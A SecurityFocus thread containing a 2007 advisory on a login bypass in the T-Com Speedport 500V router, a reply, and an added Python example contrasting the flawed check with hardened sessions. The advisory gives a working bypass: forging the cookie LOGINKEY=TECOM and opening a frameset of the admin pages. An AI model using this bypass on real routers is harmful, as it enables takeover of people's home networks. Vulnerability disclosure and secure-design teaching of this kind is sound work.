Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass Jan 19 2007 02:58PM
Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass Jan 22 2007 12:35PM
security (at) yospot (dot) de [email concealed] (security yospot de)
Since this is not the first security problem on this router, and
Deutsche Telekom really does not care, I advise everyone to use
alternative means of routing / dialing up. The modem shipped in
conjunction with this router requires VLAN support. Dialup requests
will only be served on VLAN 7.

More information can be found on man-wiki; although it deals with the
700V, which has the same security problems, it also applies to the 500V
version.
<a href="http://man-wiki.net/index.php/T-Home_IPTV_without_speedport_W_700V">man-wiki</a>
and
<a href="http://man-wiki.net/index.php/T-Home_IPTV_over_wireless_bridge">man-wiki</a>

On Linux a "vconfig add eth0 7" will allow you to dial up without the
Speedport 500V

Regards,
<a href="http://www.mohammadkhani.eu/">Amir Mohammadkhani</a>

advisory07 (at) smtp (dot) ru [email concealed] wrote:
> - - - --------------------------------------------------------------------
> Virginity Security Advisory 2007-001
> - - - --------------------------------------------------------------------
> DATE : 2007-01-19 15:32 GMT
> TYPE : remote
> VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31
> AUTHOR : Virginity
> ADVISORY NUMBER : 005
> - - - --------------------------------------------------------------------
>
>
> Description:
>
> The Speedport 500V is a broadband router which is sold in Germany along
> with ADSL lines. (just so you know)
>
> The system is stupid and verifies whether you have entered the correct
> password by setting a cookie with the content LOGINKEY=TECOM
> (this is hardcoded and can not be changed)
> If an attacker simply creates this cookie he can bypass password
> authentication by simply calling the configuration html sites directly.
>
> The attacker then has nearly full system access (you cannot change the
> system password without knowing the old one) and can change system
> configuration e.g. disable the firewall. You can also perform a firmware
> upgrade, which allows you to reset the password to the default one, which
> now gives you full system access.
>
> Vendor has not been notified. I don't think they care^^.
>
> - - - --------------------------------------------------------------------
>
>
> Example:
>
> Create a cookie like this:
>
> Name: LOGINKEY
> Content: TECOM
> Host: <ipaddress> <- replace this by your routers ipaddress ;)
> Path: /
> Expires: Never
>
> create a html page like this and open it in your browser:
>
> <html>
> <frameset rows="44,*" border=0 frameborder=0 framespacing=0>
> <frame src="http://<ipaddress>/b_banner.htm" name="banner">
> <frameset cols="170,*" border=0 frameborder=0 framespacing=0>
> <frame src="http://<ipaddress>/m_startseite.htm" name="menu">
> <frame src="http://<ipaddress>/hcti_startseite.htm" name="hcti">
> </frameset>
> </frameset>
> </html>
>
> this will bypass the login screen and lead you directly to configuration
> menu.
>
> - - - --------------------------------------------------------------------
>
>
> Workaround:
>
> Download the source code from the vendor (GPL), replace TECOM with something
> else, try building it, and then try installing it on the hardware.
> I did not try this. It's stupid and does not really solve the problem.
>
> - - - --------------------------------------------------------------------
>
>
> Personal note:
>
> Still here... sadly not dead yet. Maybe I should hack the NSA so they kill
> me? *lol* Guess I'd have to learn some real things.... greetz to s.
> and that other admin.
>
> - - - --------------------------------------------------------------------
>

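The advisory's root cause is that the router's only proof of login is a fixed cookie value compiled into the firmware, so the "session" is a shared secret that is not secret. The following is an added example (not firmware code, not from either poster) that models that weak check next to a hardened one: a random per-login token, remembered server-side with an expiry, issued only after a password check against a salted PBKDF2 hash. The credential values, cookie name `SESSION` and the `Credentials`/`SessionStore` classes are constructed for illustration.

```python
import hashlib
import hmac
import secrets
import time
from http.cookies import CookieError, SimpleCookie
from typing import Dict, Optional

# ---------------------------------------------------------------------------
# Weak scheme (constructed model of what the advisory describes): the whole
# proof of login is a fixed cookie value baked into the firmware.
# ---------------------------------------------------------------------------
STATIC_LOGIN_KEY = "TECOM"


def _cookie_value(cookie_header: str, name: str) -> Optional[str]:
    """Return the value of cookie `name` from a raw Cookie: header, or None."""
    jar = SimpleCookie()
    try:
        jar.load(cookie_header)
    except CookieError:
        return None
    morsel = jar.get(name)
    return morsel.value if morsel is not None else None


def weak_is_authenticated(cookie_header: str) -> bool:
    """Any client that sets LOGINKEY=TECOM passes, with no login ever performed."""
    return _cookie_value(cookie_header, "LOGINKEY") == STATIC_LOGIN_KEY


# ---------------------------------------------------------------------------
# Hardened scheme: random token per login, tracked server-side, time-limited,
# and only issued after a salted password hash check.
# ---------------------------------------------------------------------------
def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class Credentials:
    """Constructed single-user store; a real device would persist this in flash."""

    def __init__(self, username: str, password: str):
        self.username = username.encode()
        self.salt = secrets.token_bytes(16)
        self.digest = _hash_password(password, self.salt)

    def check(self, username: str, password: str) -> bool:
        # Always hash, and compare in constant time, so timing leaks nothing.
        candidate = _hash_password(password, self.salt)
        user_ok = hmac.compare_digest(username.encode(), self.username)
        pass_ok = hmac.compare_digest(candidate, self.digest)
        return user_ok and pass_ok


class SessionStore:
    def __init__(self, creds: Credentials, ttl_seconds: int = 600):
        self.creds = creds
        self.ttl = ttl_seconds
        self._sessions: Dict[str, float] = {}  # token -> expiry (unix time)

    def login(self, username: str, password: str,
              now: Optional[float] = None) -> Optional[str]:
        """Return a fresh session token on success, None on a bad password."""
        if not self.creds.check(username, password):
            return None
        token = secrets.token_urlsafe(32)  # 256 random bits: not guessable
        current = now if now is not None else time.time()
        self._sessions[token] = current + self.ttl
        return token

    def is_authenticated(self, cookie_header: str,
                         now: Optional[float] = None) -> bool:
        """True only for a token this store issued and that has not expired."""
        token = _cookie_value(cookie_header, "SESSION")
        if token is None:
            return False
        expiry = self._sessions.get(token)
        if expiry is None:
            return False
        current = now if now is not None else time.time()
        if current > expiry:
            del self._sessions[token]  # expired: forget it server-side
            return False
        return True

    def logout(self, cookie_header: str) -> None:
        token = _cookie_value(cookie_header, "SESSION")
        if token is not None:
            self._sessions.pop(token, None)


def demo() -> Dict[str, bool]:
    """Exercise both schemes with constructed credentials and fixed clocks."""
    creds = Credentials("admin", "constructed-demo-password")
    store = SessionStore(creds, ttl_seconds=600)
    results = {}
    results["weak_accepts_static_cookie"] = weak_is_authenticated("LOGINKEY=TECOM")
    results["hardened_rejects_static_cookie"] = store.is_authenticated("LOGINKEY=TECOM")
    results["hardened_rejects_forged_token"] = store.is_authenticated(
        "SESSION=" + secrets.token_urlsafe(32))
    results["bad_password_gets_no_token"] = store.login("admin", "wrong") is None
    token = store.login("admin", "constructed-demo-password", now=1000.0)
    results["valid_session_accepted"] = store.is_authenticated(f"SESSION={token}", now=1001.0)
    results["expired_session_rejected"] = store.is_authenticated(f"SESSION={token}", now=2000.0)
    return results
```

The weak check has no server-side state at all, which is why the advisory's forged cookie works against every unit ever shipped; the hardened `SessionStore` makes a cookie worthless unless the device itself minted it after a successful password check, and it stops being valid when it expires or is logged out. Rebuilding the firmware with a different constant, as the advisory's workaround suggests, only changes the shared secret; it does not add the missing server-side binding.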
Copyright 2010, SecurityFocus